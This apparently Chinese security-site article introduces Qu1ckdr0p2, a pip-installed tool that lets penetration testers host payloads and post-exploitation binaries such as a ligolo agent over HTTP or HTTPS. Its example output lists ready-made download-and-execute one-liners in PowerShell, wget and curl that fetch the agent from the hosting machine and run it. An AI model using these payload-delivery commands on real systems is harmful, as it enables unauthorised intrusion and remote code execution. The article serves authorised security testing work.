關于Qu1ckdr0p2
Qu1ckdr0p2是一款功能強大的文件托管工具,在該工具的幫助下,廣大研究人員可以快速通過HTTP或HTTPS托管包括Payload和后滲透代碼在內的任何文件。
Qu1ckdr0p2提供了別名和搜索功能,相關功能模塊位于qu1ckdr0p2-tools庫中。默認配置下,使用--https選項時該工具將生成一個自簽名證書,,當Web服務器運行時,tun0接口會被優先使用,否則它將使用eth0接口。
common.ini文件中定義了--search和-u選項中需要使用的映射別名。
當網絡服務器運行時,屏幕上會打印出幾個下載地址,廣大研究人員可以直接復制和粘貼使用。
工具安裝
注意:當前版本的Qu1ckdr0p2僅支持通過pip工具進行安裝,如果你直接將該項目源碼克隆至本地的話,可能會出現一些意外問題。
首先,我們需要在本地設備上安裝并配置好Python 3環境。接下來,直接使用pip3工具安裝Qu1ckdr0p2:
pip3 install qu1ckdr0p2 echo "alias serv='~/.local/bin/serv'" >> ~/.zshrc source ~/.zshrc
或者:
echo "alias serv='~/.local/bin/serv'" >> ~/.bashrc source ~/.bashrc serv init --update
工具使用
在當前工作目錄下托管一個單獨的文件:
$ serv serve -f implant.bin --https 443 $ serv serve -f file.example --http 8080
工具更新和幫助信息:
$ serv --help Usage: serv [OPTIONS] COMMAND [ARGS]... Welcome to qu1ckdr0p2 entry point. Options: --debug 啟用調試模式 --help 顯示工具幫助信息和退出 Commands: init 執行更新 serve 托管文件 $ serv serve --help Usage: serv serve [OPTIONS] Serve files. Options: -l, --list 查看別名 -s, --search TEXT 搜索別名 -u, --use INTEGER 使用動態數字作為別名 -f, --file FILE 托管一個文件 --http INTEGER 使用HTTP+自定義端口 --https INTEGER 使用HTTPS+自定義端口 -h, --help 顯示幫助信息和退出 $ serv init --help Usage: serv init [OPTIONS] Perform updates. Options: --update 檢查并下載缺失的工具組件 --update-self 使用pip更新工具 --update-self-test 使用開發測試,將安裝不穩定的工具組件 --help 顯示幫助信息和退出
工具更新命令:
$ serv init --update $ serv init --update-self
從映射別名托管一個文件
-u選項要設置的映射別名數字是動態的,因此我們不需要記住指定的數字或輸入工具名稱:
$ serv serve --search ligolo
[→] Path: ~/.qu1ckdr0p2/windows/agent.exe
[→] Alias: ligolo_agent_win
[→] Use: 1
[→] Path: ~/.qu1ckdr0p2/windows/proxy.exe
[→] Alias: ligolo_proxy_win
[→] Use: 2
[→] Path: ~/.qu1ckdr0p2/linux/agent
[→] Alias: ligolo_agent_linux
[→] Use: 3
[→] Path: ~/.qu1ckdr0p2/linux/proxy
[→] Alias: ligolo_proxy_linux
[→] Use: 4
(...)
$ serv serve --search ligolo -u 3 --http 80
[→] Serving: ../../.qu1ckdr0p2/linux/agent
[→] Protocol: http
[→] IP address: 192.168.1.5
[→] Port: 80
[→] Interface: eth0
[→] CTRL+C to quit
[→] URL: http://192.168.1.5:80/agent
[↓] csharp:
$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile('http://192.168.1.5:80/agent', 'c:\windows\temp\agent'); Start-Process 'c:\windows\temp\agent'
[↓] wget:
wget http://192.168.1.5:80/agent -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent
[↓] curl:
curl http://192.168.1.5:80/agent -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent
[↓] powershell:
Invoke-WebRequest -Uri http://192.168.1.5:80/agent -OutFile c:\windows\temp\agent; Start-Process c:\windows\temp\agent
? Web server running
工具運行截圖






許可證協議
本項目的開發與發布遵循MIT開源許可證協議。
項目地址
Qu1ckdr0p2:https://github.com/byinarie/qu1ckdr0p2
參考資料
https://github.com/byinarie/qu1ckdr0p2-tools
RacentYY
FreeBuf
ManageEngine卓豪
RacentYY
一顆小胡椒
嘶吼專業版
Anna艷娜
cayman
ManageEngine卓豪
Anna艷娜